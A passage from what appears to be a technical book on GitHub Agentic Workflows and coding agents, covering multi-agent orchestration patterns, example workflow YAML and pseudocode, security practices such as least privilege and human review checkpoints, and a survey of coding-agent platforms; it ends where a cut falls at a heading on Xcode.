Ecosystem Growth: From Single Repos to Agent Factories

GH-AW adoption has expanded beyond single-repo use cases. Practitioners have begun publishing multi-repository workflow libraries: for example, the “Peli’s Agent Factory” blog series documents a pattern of over 100 GH-AW workflows maintained across repositories with shared components, versioned imports, and centralised governance policies. This pattern—agent factory as infrastructure—validates the composition primitives described above and suggests that GH-AW is scaling beyond individual repositories into platform-level automation.

The gh aw CLI has also matured with gh aw upgrade for in-place CLI updates and gh aw update for refreshing vendored action directories within repositories, reducing the maintenance burden for teams running many GH-AW-enabled repos.

Operational Lessons from Production Runs

Running the workflows in real issue traffic surfaced several practical lessons.

Token identity is part of the control plane. When safe-outputs uses a PAT-backed token, workflow-created comments, labels, issues, and pull requests are attributed to that token owner instead of github-actions[bot]. This affects audit trails and reviewer expectations.

Label-trigger chains require explicit token strategy. In this repository, default-token label writes were not consistently sufficient to trigger downstream workflows. A robust pattern is to use workflow_dispatch for critical handoffs and reserve PAT-backed label writes for stage transitions that must emit label-trigger events.

Concurrency should be keyed by business entity. Routing initially used a shared concurrency group, which caused cancellations during burst issue intake. Scoping concurrency by issue identifier avoids cross-issue cancellation and preserves throughput under concurrent events.

Failure tracking can generate meta-issues. GH-AW failure-handling workflows may create tracker issues for failed runs. Treat these as operations artifacts, not content suggestions, and route/exclude them accordingly.

Test sequencing matters. Validate each lifecycle path sequentially first (reject, fast-track, slow-track), then run burst/concurrency tests. This separates logic correctness from race-condition debugging.

Key Takeaways

GH-AW turns markdown instructions into reproducible GitHub Actions workflows, combining the readability of documentation with the reliability of automation. Frontmatter defines triggers, permissions, tools, and models, giving you fine-grained control over what the agent can do. Imports enable composable, reusable workflow building blocks that reduce duplication across repositories. Safe inputs and outputs combined with least-privilege permissions reduce the risk of unintended changes. The ResearchPlanAssign pattern provides a practical loop for continuous, agent-powered improvement with human oversight at key decision points.

GitHub Agents

Chapter Preview

This chapter describes how agents operate inside GitHub issues, pull requests, and Actions, providing practical context for building agent-powered workflows. It shows safe assignment, review, and approval flows that keep humans in control of consequential changes. Finally, it maps GitHub agent capabilities to real repository workflows, demonstrating patterns you can adapt for your own projects.

Understanding GitHub Agents

GitHub Agents represent a new paradigm in software development automation. They are AI-powered assistants that can understand context, make decisions, and take actions within the GitHub ecosystem. Unlike traditional automation that follows predefined scripts, agents can adapt to situations, reason about problems, and collaborate with humans and other agents.

This chapter explores the landscape of GitHub Agents, their capabilities, and how to leverage them effectively in your development workflows.

The GitHub Agent Ecosystem

GitHub Copilot

GitHub Copilot (https://docs.github.com/en/copilot) is the foundation of GitHub’s AI-powered development tools. It provides code completion with real-time suggestions as you type, predicting the code you’re likely to write next. It offers a chat interface for natural language conversations about code, allowing you to ask questions and request explanations. And it provides context awareness, understanding your codebase and intent so suggestions fit your project’s patterns and conventions.

# Example: Copilot helping write a function
# Just start typing a comment describing what you need:
# Function to validate email addresses using regex
def validate_email(email):
    import re
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    return bool(re.match(pattern, email))

GitHub Copilot Coding Agent

The Coding Agent extends Copilot’s capabilities to autonomous task completion. See https://docs.github.com/en/copilot/how-tos/use-copilot-agents/coding-agent for the supported assignment and review flow.

The Coding Agent can receive assigned tasks from issues or requests and work independently without continuous human guidance. It supports multi-file changes, modifying multiple files across a codebase in a single operation. It handles pull request creation, generating complete PRs with descriptions that explain what changed and why. And it supports iterative development, responding to review feedback and making additional changes based on comments.

Key Characteristics:

Feature	Description
Autonomy	Works independently on assigned tasks
Scope	Can make changes across entire repositories
Output	Creates branches, commits, and pull requests
Review	All changes go through normal PR review

GitHub Actions Agents

Agents can be orchestrated through GitHub Actions workflows:

name: Agent Workflow
on:
  issues:
    types: [opened]

jobs:
  agent-task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      - name: Process with Agent
        uses: actions/github-script@v8
        with:
          script: |
            // Agent logic to analyze and respond
            const issue = context.payload.issue;
            // ... agent processing

Tip: In production workflows, pin third-party actions to a full commit SHA to reduce supply-chain risk.

Warning: Require human approval before any agent-created PR is merged, and log all agent actions for auditability.

Agent Capabilities

Reading and Understanding

Agents can read and understand various types of content within a repository. They can process code, including source files, configurations, and dependency manifests. They can interpret documentation such as READMEs, wikis, and inline comments. They can analyse issues and pull requests, including descriptions, comments, and reviews. And they can comprehend repository structure, recognising file organisation patterns and project conventions.

Writing and Creating

Agents can produce several types of output. They can make code changes, creating new files, modifying existing ones, or refactoring for improved structure. They can write documentation, including READMEs, inline comments, and API docs. They can create issues and comments, posting status updates and analysis reports. And they can generate pull requests with complete descriptions that explain the changes.

Reasoning and Deciding

Agents can perform higher-level cognitive tasks. They can analyse problems, understanding issue context and requirements to identify what needs to be done. They can plan solutions, breaking down complex tasks into manageable steps. They can make decisions, choosing between alternative approaches based on trade-offs. And they can adapt, responding to feedback and changing requirements rather than failing when conditions shift.

Multi-Agent Orchestration

Why Multiple Agents?

Single agents have limitations in capability, perspective, and throughput. Multi-agent systems address these through four key benefits.

Specialisation allows each agent to excel at specific tasks, with dedicated agents for code review, documentation, testing, and other concerns. Perspective diversity means different models bring different strengths—one model may be better at security analysis while another excels at explaining concepts clearly. Scalability enables parallel processing of independent tasks, reducing total time to completion. Resilience ensures that failure of one agent does not stop the workflow; other agents can continue working or pick up where the failed agent left off.

Orchestration Patterns

Sequential Pipeline

Agents work in sequence, each building on the previous:

Issue -> ACK Agent -> Research Agent -> Writer Agent -> Review Agent -> Complete

Example workflow stages:

jobs:
  stage-1-acknowledge:
    runs-on: ubuntu-latest
    if: github.event.action == 'opened'
    # Acknowledge and validate
    
  stage-2-research:
    runs-on: ubuntu-latest
    needs: stage-1-acknowledge
    if: needs.stage-1-acknowledge.outputs.is_relevant == 'true'
    # Research and analyze
    
  stage-3-write:
    runs-on: ubuntu-latest
    needs: stage-2-research
    # Create content

Parallel Discussion

Multiple agents contribute perspectives simultaneously:

jobs:
  discuss:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        agent: [claude, copilot, gemini]
    steps:
      - name: Agent Perspective
        # Each agent provides its view

Human-in-the-Loop

Agents work until human decision is needed:

Agents work -> Human checkpoint -> Agents continue

This pattern is essential for approving significant changes that have broad impact, resolving ambiguous decisions where judgement is required, and ensuring quality assurance before changes reach production.

Agent Handoff Protocol

When agents need to pass context to each other, they follow a structured handoff protocol.

State in labels. Agents use GitHub labels to track workflow stage, allowing both humans and other agents to see at a glance where an issue stands in the process.

Context in comments. Agents document their findings in issue comments, creating a persistent record of what was discovered and decided.

Structured output. Agents use consistent formats for machine readability, enabling downstream agents to parse and act on upstream results programmatically.

# Example: Structured agent output
- name: Agent Report
  uses: actions/github-script@v8
  with:
    script: |
      const report = {
        stage: 'research',
        findings: [...],
        recommendation: 'proceed',
        nextAgent: 'writer'
      };
      // Store in comment or labels

Implementing GitHub Agents

Agent Definition Files

Define agents in markdown files with frontmatter:

---
name: Research Agent
description: Analyzes issues and researches documentation
tools:
  github:
    toolsets: [issues]
  web-search:
  edit:
---

# Research Agent

You are the research agent for this repository.
Your role is to analyze suggestions and assess their value.

## Tasks
1. Search existing documentation
2. Find relevant external sources
3. Assess novelty and interest
4. Report findings

Agent Configuration

Control agent behavior through configuration:

# .github/agents/config.yml
agents:
  research:
    enabled: true
    model: copilot
    timeout: 300
    
  writer:
    enabled: true
    model: copilot
    requires_approval: true
    
safety:
  max_file_changes: 10
  protected_paths:
    - .github/workflows/
    - SECURITY.md

Error Handling

Agents should handle failures gracefully:

- name: Agent Task with Error Handling
  id: agent_task
  continue-on-error: true
  uses: actions/github-script@v8
  with:
    script: |
      try {
        // Agent logic
      } catch (error) {
        await github.rest.issues.addLabels({
          owner: context.repo.owner,
          repo: context.repo.repo,
          issue_number: context.issue.number,
          labels: ['agent-error']
        });
        await github.rest.issues.createComment({
          owner: context.repo.owner,
          repo: context.repo.repo,
          issue_number: context.issue.number,
          body: `WARNING: Agent encountered an error: ${error.message}`
        });
      }

Best Practices

Clear Agent Personas

Give each agent a clear identity and responsibility:

## You Are: The Research Agent

**Your Role:** Investigate and analyze
**You Are Not:** A decision maker or implementer
**Hand Off To:** Writer Agent after research is complete

Structured Communication

Use consistent formats for agent-to-agent communication:

## Agent Report Format

### Status: [Complete/In Progress/Blocked]
### Findings:
- Finding 1
- Finding 2
### Recommendation: [Proceed/Revise/Decline]
### Next Stage: [stage-name]

Human Checkpoints

Always include human review points at critical junctures. Review should happen before significant changes that could affect production systems or user experience. Review should happen after agent recommendations, ensuring a human validates the suggested course of action. And review should happen before closing issues, confirming that the work is complete and meets requirements.

Audit Trail

Maintain visibility into agent actions throughout the workflow. All agent actions should be visible in comments, creating a complete record of what happened. Use labels to track workflow state, making progress visible at a glance. Log important decisions and reasoning so future reviewers can understand why choices were made.

Graceful Degradation

Design for agent failures rather than assuming they will not occur. Use continue-on-error for non-critical steps so that failures do not halt the entire workflow. Provide manual fallback options that humans can use when automated approaches fail. Alert maintainers when intervention is needed, ensuring problems are addressed promptly.

Security Considerations

Least Privilege

Agents should have minimal permissions:

permissions:
  contents: read  # Only write if needed
  issues: write   # To comment and label
  pull-requests: write  # Only if creating PRs

Input Validation

Validate data before agent processing:

// Validate issue body before processing
const body = context.payload.issue.body || '';
if (body.length > 10000) {
  throw new Error('Issue body too long');
}

Output Sanitization

Sanitize agent outputs:

// Escape user content in agent responses
const safeTitle = issueTitle.replace(/[<>]/g, '');

Protected Resources

Prevent agents from modifying sensitive files:

# In workflow: check protected paths
- name: Check Protected Paths
  run: |
    CHANGED_FILES=$(git diff --name-only HEAD~1)
    if echo "$CHANGED_FILES" | grep -E "^(SECURITY|\.github/workflows/)"; then
      echo "Protected files modified - requires human review"
      exit 1
    fi

Real-World Example: This Book

This very book uses GitHub Agents for self-maintenance:

The Multi-Agent Workflow

ACK Agent: Acknowledges new issue suggestions
Research Agent: Analyzes novelty and relevance
Claude Agent: Provides safety and clarity perspective
Copilot Agent: Provides developer experience perspective
Workflow Agent: Defines the issue-management lifecycle and maps each stage to GH-AW workflow files
Writer Agent: Drafts new content
Completion Agent: Finalizes and closes issues

How It Works

+-------------+     +-------------+     +-------------+
| Issue       | --> | ACK Agent   | --> | Research    |
| Opened      |     |             |     | Agent       |
+-------------+     +-------------+     +-------------+
                                               |
                                               v
+-------------+     +-------------+     +-------------+
| Complete    | <-- | Writer      | <-- | Multi-Model |
| Agent       |     | Agent       |     | Discussion  |
+-------------+     +-------------+     +-------------+
                          |
                          v
                    +-------------+
                    | Human       |
                    | Review      |
                    +-------------+

Configuration

The workflow is defined using GitHub Agentic Workflows (GH-AW). The repository includes GH-AW workflows in .github/workflows/issue-*.lock.yml and shared phase prompts in .github/agents/phase1.md and .github/agents/phase2.md.

For a detailed explanation of the workflow architecture and why GH-AW is the canonical approach, see the repository’s README workflow section and WORKFLOW_PLAYBOOK.md.

Multi-Agent Platform Compatibility

Modern repositories need to support multiple AI agent platforms. Different coding assistants—GitHub Copilot (https://docs.github.com/en/copilot), Claude (https://code.claude.com/docs), OpenAI Codex (https://openai.com/index/introducing-codex/), and others—each have their own ways of receiving project-specific instructions. This section explains how to structure a repository for cross-platform agent compatibility.

The Challenge of Agent Diversity

When multiple AI agents work with your repository, you face a coordination challenge. GitHub Copilot reads .github/copilot-instructions.md for project-specific guidance. Claude automatically incorporates CLAUDE.md; the generic AGENTS.md may still be useful as shared project documentation but should be explicitly referenced for reliable Claude workflows. OpenAI Codex (GPT-5.3-Codex) can be configured with system instructions and skills packaged via SKILL.md (see https://developers.openai.com/codex). Generic agents look for AGENTS.md as the emerging standard for project-level instructions.

Note: Both Claude and Codex are available as GitHub engines in public preview, joining Copilot as first-class options for GitHub-integrated agentic workflows. On February 4, 2026, GitHub launched Agent HQ, a multi-agent orchestration surface that lets developers assign tasks to Copilot, Claude, or Codex from GitHub.com, the GitHub mobile app, and VS Code—and compare how different agents approach the same problem. Each agent session consumes one premium request from the subscriber’s monthly allocation. GitHub is working with Google, Cognition, and xAI to add more agents to the platform. With 20 million+ Copilot users and 90% Fortune 100 adoption, Agent HQ positions GitHub as a neutral multi-agent broker rather than a single-vendor tool.

Each platform has slightly different expectations, but the core information they need is similar: project structure, coding conventions, build commands, and constraints.

Three Automation Paths to Distinguish

In GitHub repositories, “Claude/Codex automation” usually appears in three distinct forms:

Third-party agent interactions in issues/PRs (thread-level collaboration).
Standard GitHub Actions wrappers (for example vendor actions in YAML).
GH-AW engine execution (engine: copilot|claude|codex) in compiled agentic workflows.

Treat these as complementary, not interchangeable. They have different trigger models, permission boundaries, and audit trails. For detailed workflow-level tradeoffs, see GitHub Agentic Workflows (GH-AW).

Repository Documentation as Agent Configuration

Your repository’s documentation files serve dual purposes—they guide human contributors AND configure AI agents. Key files include:

File	Human Purpose	Agent Purpose
`README.md`	Project overview	Context for understanding the codebase
`WORKFLOW_PLAYBOOK.md`	Lifecycle and label matrix	Source of truth for issue workflow routing
`.github/copilot-instructions.md`	N/A	Copilot-specific configuration
`AGENTS.md`	N/A	Generic agent instructions
`CLAUDE.md`	N/A	Claude-specific configuration

The copilot-instructions.md File

GitHub Copilot reads .github/copilot-instructions.md to understand how to work with your repository. Keep this file short and operational: project purpose, build/test commands, protected paths, and security constraints. For canonical long-form structure examples, see Skills and Tools Management.

Cross-Platform Strategy

For maximum compatibility across AI agent platforms, follow these practices:

Pick a canonical source per platform (AGENTS.md for many coding agents, CLAUDE.md for Claude)
Cross-reference shared guidance between platform files to reduce drift
Keep instructions DRY by avoiding unnecessary duplication
Test with multiple agents to ensure instructions work correctly

Example hierarchy:

project/
|-- AGENTS.md                      # Canonical agent instructions
|-- CLAUDE.md                      # Claude-specific (may reference AGENTS.md)
|-- .github/
|   `-- copilot-instructions.md    # Copilot-specific (may reference AGENTS.md)
`-- src/
    `-- AGENTS.md                  # Module-specific instructions

This Repository’s Approach

This book repository demonstrates multi-platform compatibility through several mechanisms. The .github/copilot-instructions.md file provides Copilot configuration with project structure, coding guidelines, and constraints. The Skills and Tools Management and Agents for Coding chapters discuss AGENTS.md as the emerging standard. The documentation files such as README and WORKFLOW_PLAYBOOK provide context any agent can use. The GH-AW workflows use the engine: copilot setting but the pattern works with other engines.

The key insight is that well-structured documentation benefits both human developers and AI agents. When you write clear README files, contribution guidelines, and coding standards, you are simultaneously creating better agent configuration.

Best Practices for Agent-Friendly Repositories

Several practices make repositories more compatible with AI agents.

Be explicit about constraints. Clearly state what agents should NOT do, preventing them from making changes that would violate project policies.

Document your tech stack. Agents perform better when they understand the tools in use, including languages, frameworks, and build systems.

Describe the project structure. Help agents navigate your codebase efficiently by explaining where different types of code live.

Provide examples. Show preferred patterns through code examples that agents can emulate.

List protected paths. Specify files agents should not modify, such as security-critical configuration or workflow definitions.

Include build and test commands. Enable agents to verify their changes work correctly before submitting them for review.

State coding conventions. Help agents write consistent code that matches your project’s style.

Future of GitHub Agents

Emerging Capabilities

Several capabilities are becoming increasingly mature. Code generation now produces production-quality code that can be merged with minimal human editing. Test authoring automates test creation and maintenance, keeping test suites current as code evolves. Documentation sync keeps docs aligned with code, detecting when documentation drifts from implementation. Security analysis provides proactive vulnerability detection, identifying issues before they reach production.

Integration Trends

Integration is deepening across several dimensions. IDE integration brings deeper VS Code and editor support, making agents available throughout the development workflow. CI/CD native support treats agents as first-class CI/CD citizens rather than add-ons. Cross-repo capabilities allow agents to work across multiple repositories, coordinating changes that span projects. Multi-cloud support enables agents to coordinate across platforms, working with infrastructure that spans providers.

Key Takeaways

GitHub Agents are AI-powered assistants that can reason, decide, and act within repositories, going beyond simple autocomplete to autonomous task completion.

Copilot Coding Agent can autonomously complete tasks and create pull requests, working independently on assigned issues while respecting review requirements.

Multi-agent orchestration enables specialised, resilient, and scalable automation by dividing work among agents with different strengths.

Human checkpoints remain essential for quality and safety; agents propose changes but humans make final decisions on consequential modifications.

Clear protocols for agent communication ensure smooth handoffs, using labels, comments, and structured output to pass context between agents.

Security must be designed into agent workflows from the start, with least-privilege permissions, input validation, and protected paths.

Multi-platform compatibility is achieved through well-structured documentation including copilot-instructions.md, AGENTS.md, and related files.

This book demonstrates these concepts through its own multi-agent maintenance workflow, serving as a working example of the patterns described.

Learn More

Repository Documentation

This book’s repository includes comprehensive documentation that demonstrates OSS best practices:

README - Overview and quick start guide
Contributing section - How to contribute using issue-driven workflows
Workflows section - Publishing and validation workflow overview
SETUP - Installation and configuration instructions
WORKFLOW_PLAYBOOK - Agentic workflow maintenance patterns
AGENTS - Contributor notes and required checks
CLAUDE - Repository-specific agent guidance
Workflow authoring notes - GH-AW compilation and lifecycle rules
LICENSE - MIT License

Agent Configuration Files

These files configure how AI agents work with this repository:

.github/copilot-instructions.md - GitHub Copilot-specific configuration including project structure, coding guidelines, and constraints

These documents serve as both useful references and examples of how to structure documentation for projects using agentic workflows.

Skills and Tools Management - Covers AGENTS.md standard and MCP protocol for tool management
GitHub Agentic Workflows (GH-AW) - GH-AW specification and engine configuration
Agents for Coding - Detailed coverage of coding agent platforms

Agents for Coding

Chapter Preview

This chapter compares coding-agent architectures and team patterns, helping you choose the right approach for your project’s complexity and scale. It shows the correct way to configure GitHub Copilot coding agent, with working examples you can adapt. Finally, it provides buildable examples with clear labels distinguishing runnable code from pseudocode.

Introduction

Coding agents represent the most mature category of AI agents in software development. They have evolved from simple autocomplete tools to autonomous entities capable of planning, writing, testing, debugging, and even scaffolding entire software architectures with minimal human input. This chapter explores the specialized architectures, scaffolding patterns, and best practices for deploying agents in coding workflows.

The Evolution of Coding Agents

From Autocomplete to Autonomy

The progression of coding agents follows a clear trajectory through four phases.

Code Completion (2020–2022) introduced basic pattern matching and next-token prediction, offering suggestions for the next few tokens based on immediate context.

Context-Aware Assistance (2022–2024) added understanding of project structure and intent, allowing agents to make suggestions that fit the broader codebase.

Task-Oriented Agents (2024–present) can complete multi-step tasks independently, taking a high-level instruction and executing a series of operations to fulfil it.

Autonomous Development (emerging) represents the frontier, with agents capable of full feature implementation, testing, and deployment with minimal human intervention.

Current Capabilities

Modern coding agents can perform a range of sophisticated tasks.

Understand requirements. Agents can parse natural language specifications and translate them to code, bridging the gap between human intent and machine-executable instructions.

Plan solutions. Agents can break down complex features into implementable steps, creating a roadmap for development.

Generate code. Agents can write production-quality code across multiple files, handling everything from utility functions to full modules.

Test and debug. Agents can create tests, identify bugs, and fix issues, shortening the feedback loop between writing code and validating it.

Scaffold projects. Agents can initialise projects with appropriate structure and configuration, setting up the foundation for further development.

Review and refactor. Agents can analyse code quality and suggest improvements, helping maintain code health over time.

Specialized Architectures

Single-Agent Architectures

The simplest architecture involves one agent with access to all necessary tools.

Example 7-2. Single-agent architecture (pseudocode)

class CodingAgent:
    """Single-agent architecture for coding tasks"""
    
    def __init__(self, llm, tools):
        self.llm = llm
        self.tools = {
            'file_read': FileReadTool(),
            'file_write': FileWriteTool(),
            'terminal': TerminalTool(),
            'search': CodeSearchTool(),
            'test_runner': TestRunnerTool()
        }
        self.context = AgentContext()
    
    async def execute(self, task: str) -> dict:
        """Execute a coding task end-to-end"""
        # 1. Understand the task
        plan = await self.plan_task(task)
        
        # 2. Execute each step
        results = []
        for step in plan.steps:
            result = await self.execute_step(step)
            results.append(result)
            
            # Adapt based on results
            if not result.success:
                plan = await self.replan(plan, result)
        
        return {'success': True, 'results': results}

Best for: Simple tasks, small codebases, single-developer workflows.

Multi-Agent Architectures

Complex projects benefit from specialized agents working together.

Example 7-3. Multi-agent architecture (pseudocode)

class CodingAgentTeam:
    """Multi-agent architecture mirroring a development team"""
    
    def __init__(self):
        self.architect = ArchitectAgent()
        self.implementer = ImplementerAgent()
        self.tester = TesterAgent()
        self.reviewer = ReviewerAgent()
        self.coordinator = CoordinatorAgent()
    
    async def execute_feature(self, specification: str):
        """Execute a feature request using the agent team"""
        
        # 1. Architecture phase
        design = await self.architect.design(specification)
        
        # 2. Implementation phase (can be parallelized)
        implementations = await asyncio.gather(*[
            self.implementer.implement(component)
            for component in design.components
        ])
        
        # 3. Testing phase
        test_results = await self.tester.test(implementations)
        
        # 4. Review phase
        review = await self.reviewer.review(implementations)
        
        # 5. Iteration if needed
        if not review.approved:
            return await self.handle_review_feedback(review)
        
        return {'success': True, 'implementation': implementations}

Best for: Large projects, team environments, complex features.

Subagent and Swarms Mode

Modern frameworks like Claude Code support dynamic subagent spawning:

class SwarmCoordinator:
    """Coordinate a swarm of specialized subagents"""
    
    def __init__(self, max_agents=10):
        self.max_agents = max_agents
        self.active_agents = {}
    
    async def spawn_subagent(self, task_type: str, context: dict):
        """Spawn a specialized subagent for a specific task"""
        
        agent_configs = {
            'frontend': FrontendAgentConfig(),
            'backend': BackendAgentConfig(),
            'devops': DevOpsAgentConfig(),
            'security': SecurityAgentConfig(),
            'documentation': DocsAgentConfig()
        }
        
        config = agent_configs.get(task_type)
        agent = await self.create_agent(config, context)
        
        self.active_agents[agent.id] = agent
        return agent
    
    async def execute_parallel(self, tasks: list):
        """Execute multiple tasks in parallel using subagents"""
        
        agents = [
            await self.spawn_subagent(task.type, task.context)
            for task in tasks
        ]
        
        results = await asyncio.gather(*[
            agent.execute(task)
            for agent, task in zip(agents, tasks)
        ])
        
        return self.aggregate_results(results)

Scaffolding for Coding Agents

Project Initialization

Coding agents need scaffolding that helps them understand and work with projects:

# .github/agents/coding-agent.yml
name: coding-agent
description: Scaffolding for coding agent operations

workspace:
  root: ./
  source_dirs: [src/, lib/]
  test_dirs: [tests/, spec/]
  config_files: [package.json, tsconfig.json, .eslintrc]

conventions:
  language: typescript
  framework: express
  testing: jest
  style: prettier + eslint

tools:
  enabled:
    - file_operations
    - terminal
    - git
    - package_manager
  restricted:
    - network_access
    - system_commands

safety:
  max_file_changes: 20
  protected_paths:
    - .github/workflows/
    - .env*
    - secrets/
  require_tests: true
  require_review: true

The AGENTS.md Standard

For canonical AGENTS.md structure and rationale, see Skills and Tools Management. For import/install/activate terminology and trust boundaries, see Discovery and Imports. In this chapter we focus on coding-agent execution patterns and platform behavior.

Context Management

Coding agents need effective context management to work across large codebases:

class CodingContext:
    """Manage context for coding agents"""
    
    def __init__(self, workspace_root: str):
        self.workspace_root = workspace_root
        self.file_index = FileIndex(workspace_root)
        self.symbol_table = SymbolTable()
        self.active_files = LRUCache(max_size=50)
    
    def get_relevant_context(self, task: str) -> dict:
        """Get context relevant to the current task"""
        
        # 1. Parse task to identify relevant files/symbols
        entities = self.extract_entities(task)
        
        # 2. Retrieve relevant files
        files = self.file_index.search(entities)
        
        # 3. Get symbol definitions
        symbols = self.symbol_table.lookup(entities)
        
        # 4. Include recent changes
        recent = self.get_recent_changes()
        
        return {
            'files': files,
            'symbols': symbols,
            'recent_changes': recent,
            'workspace_config': self.get_config()
        }
    
    def update_context(self, changes: list):
        """Update context after agent makes changes"""
        for change in changes:
            self.file_index.update(change.path)
            self.symbol_table.reindex(change.path)
            self.active_files.add(change.path)

Tool Registries

Coding agents need well-organized tool access:

class CodingToolRegistry:
    """Registry of tools available to coding agents"""
    
    def __init__(self):
        self._tools = {}
        self._register_default_tools()
    
    def _register_default_tools(self):
        """Register standard coding tools"""
        
        # File operations
        self.register('read_file', ReadFileTool())
        self.register('write_file', WriteFileTool())
        self.register('search_files', SearchFilesTool())
        
        # Code operations
        self.register('parse_ast', ParseASTTool())
        self.register('refactor', RefactorTool())
        self.register('format_code', FormatCodeTool())
        
        # Testing
        self.register('run_tests', RunTestsTool())
        self.register('coverage', CoverageTool())
        
        # Git operations
        self.register('git_status', GitStatusTool())
        self.register('git_diff', GitDiffTool())
        self.register('git_commit', GitCommitTool())
        
        # Package management
        self.register('npm_install', NpmInstallTool())
        self.register('pip_install', PipInstallTool())
    
    def get_tools_for_task(self, task_type: str) -> list:
        """Get tools appropriate for a task type"""
        
        task_tool_map = {
            'implementation': ['read_file', 'write_file', 'search_files', 'format_code'],
            'testing': ['read_file', 'write_file', 'run_tests', 'coverage'],
            'debugging': ['read_file', 'parse_ast', 'run_tests', 'git_diff'],
            'refactoring': ['read_file', 'write_file', 'parse_ast', 'refactor', 'run_tests']
        }
        
        tool_names = task_tool_map.get(task_type, list(self._tools.keys()))
        return [self._tools[name] for name in tool_names if name in self._tools]

Leading Coding Agent Platforms

GitHub Copilot and Coding Agent

GitHub Copilot has evolved from an IDE autocomplete tool to a full coding agent. Copilot Chat provides natural language interaction about code, allowing developers to ask questions and request explanations. Copilot Coding Agent handles autonomous task completion and PR creation, working independently on assigned tasks. Copilot Workspace offers a full development environment with agent integration, bringing together editing, testing, and deployment.

Copilot coding agent is not invoked via a custom uses: action. Instead, you assign work through GitHub Issues, Pull Requests, the agents panel, or by mentioning @copilot, and you customise its environment with a dedicated workflow file. See the official docs at https://docs.github.com/en/copilot/how-tos/use-copilot-agents/coding-agent and the environment setup guide at https://docs.github.com/en/copilot/how-tos/use-copilot-agents/coding-agent/customize-the-agent-environment.

Example 7-1. .github/workflows/copilot-setup-steps.yml

name: Copilot setup steps

on:
  push:
    paths:
      - .github/workflows/copilot-setup-steps.yml

jobs:
  # The job MUST be named copilot-setup-steps to be picked up by Copilot.
  copilot-setup-steps:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      - name: Install dependencies
        run: |
          npm ci

Claude Code

Claude Code (https://code.claude.com/docs) provides multi-agent orchestration for complex development tasks. Claude is available as a GitHub engine in public preview alongside Copilot and Codex. Its subagent architecture, powered by the native Agent Teams feature with Opus 4.6, allows you to spawn specialised agents for different concerns, each focused on a particular aspect of the problem. Swarms mode enables parallel execution of independent tasks, reducing total time to completion. Extended context handles large codebases through intelligent context management, summarising and prioritising information to fit within token limits. Claude Code can be used from the browser at claude.ai/code or from the terminal as a CLI tool.

For details on the Agent Teams coordination primitives that power this architecture, see the Claude Agent Teams section in the Agent Orchestration chapter.

Cursor AI

Cursor (https://www.cursor.com/) is an AI-first code editor designed around agent workflows. It provides project-wide understanding by indexing the entire codebase for context, ensuring suggestions fit the project’s patterns. Multi-file generation creates and modifies multiple files in one operation, handling cross-cutting changes that span components. Framework integration gives the editor deep understanding of popular frameworks, improving suggestion quality for framework-specific code. Cursor 2.0 (October 2025) introduced the Composer model and a multi-agent interface supporting up to eight parallel agents in sandboxed environments. Composer 1.5 (February 9, 2026) scaled reinforcement learning 20x over Composer 1 on the same pretrained model—post-training compute now surpasses pretraining compute for the first time. Cursor also led the creation of the Agent Trace specification (https://agent-trace.dev/), an open, vendor-neutral format for recording AI contributions alongside human authorship in version-controlled codebases, with support from Cognition, Cloudflare, Vercel, and Google Jules.

OpenAI Codex CLI

OpenAI Codex (https://developers.openai.com/codex) has evolved from an API-only model into a full coding agent platform available as a CLI, IDE extension, web interface, and macOS app. The GPT-5.3-Codex model (released February 2026) was followed on February 12 by GPT-5.3-Codex-Spark, an inference-optimised variant running on Cerebras’ Wafer Scale Engine 3 that is 15x faster than the flagship model, consistently delivering over 1,000 tokens per second. Spark introduces a persistent WebSocket connection that reduces client-server round-trip overhead by 80% and enables “Real-Time Steering”—the ability to interrupt and redirect the model mid-generation without waiting for the full block to finish. Performance falls between GPT-5.3-Codex and GPT-5.1-Codex-Mini; it is text-only at a 128k context window. The Cerebras partnership, announced in January, is worth over $10 billion and marks OpenAI’s first significant inference deployment beyond Nvidia. OpenAI also released the SWE-1.5 model, a specialised research model for autonomous software engineering tasks. Codex supports skills packaged with SKILL.md for progressive disclosure, and its CLI enables agentic workflows directly from the terminal. The macOS app serves as a command centre for managing multiple coding agents in parallel. GPT-5.3-Codex is also available directly inside GitHub Copilot as a selectable model.

Aider

Aider (https://aider.chat/) is an open-source, Git-first CLI coding agent for AI pair programming in the terminal. It works best with Claude 3.7 Sonnet, DeepSeek R1, and GPT-4o, but can connect to almost any LLM including local models. Aider makes coordinated changes across multiple files with automatic Git commits, builds a map of entire repositories for effective refactoring, and integrates automatic linting and testing. It represents the shift from suggestion-based assistance to truly agentic terminal workflows.

Devin

Devin (https://devin.ai/) by Cognition is an autonomous coding agent designed to handle tasks equivalent to four to eight hours of junior engineer work. Cognition’s valuation reached $10.2 billion following a $400M Series C in late 2025. In July 2025, Cognition acquired Windsurf, merging IDE and agent approaches. Devin excels at tasks with clear requirements and verifiable outcomes: migrations, vulnerability fixes, unit test generation, and small tickets. It is infinitely parallelisable and works asynchronously. Cognition has continued integrating Windsurf’s IDE features with Devin’s autonomous capabilities, pushing toward a unified product where IDE-level assistance and autonomous task completion share the same underlying agent infrastructure.

Windsurf

Windsurf (https://windsurf.com/), formerly Codeium, is an AI-native IDE now owned by Cognition (acquired July 2025). It is a feature-rich fork of VS Code with seamless import of existing settings and extensions. Its Cascade feature is an agentic assistant that plans multi-step edits, calls tools, and uses deep repository context. Windsurf offers a permanently free individual plan with unlimited autocomplete and chat, making it accessible for individual developers.

Snowflake Cortex Code: Domain-Specific Coding Agents

Snowflake Cortex Code (https://www.snowflake.com/en/product/features/cortex-code/), generally available as of February 2026, represents a different trajectory: a domain-specific coding agent that understands enterprise data context. Unlike general-purpose agents, Cortex Code reads users’ Snowflake schemas, compute resources, and governance policies, generating SQL and Python code that respects the organisation’s RBAC model. It is available through both the Snowsight web interface and a CLI that integrates with VS Code, Cursor, and terminal shells. The practical significance is that domain-specific agents can outperform general-purpose ones within their vertical by leveraging proprietary context—data lineage, access policies, and operational semantics—that a general-purpose model does not have. Expect similar domain-specific coding agents from other data platform vendors.

CodeGPT and Agent Marketplaces

CodeGPT (https://codegpt.co/) and marketplace-based approaches offer specialised agents. Specialised agents provide over 200 pre-built agents for specific tasks, from code review to documentation generation. Custom agent creation lets you build and share domain-specific agents tailored to your organisation’s needs. Multi-model support combines different LLMs for different tasks, using each model’s strengths where they apply best.

Apple Xcode 26.3: Agentic Coding

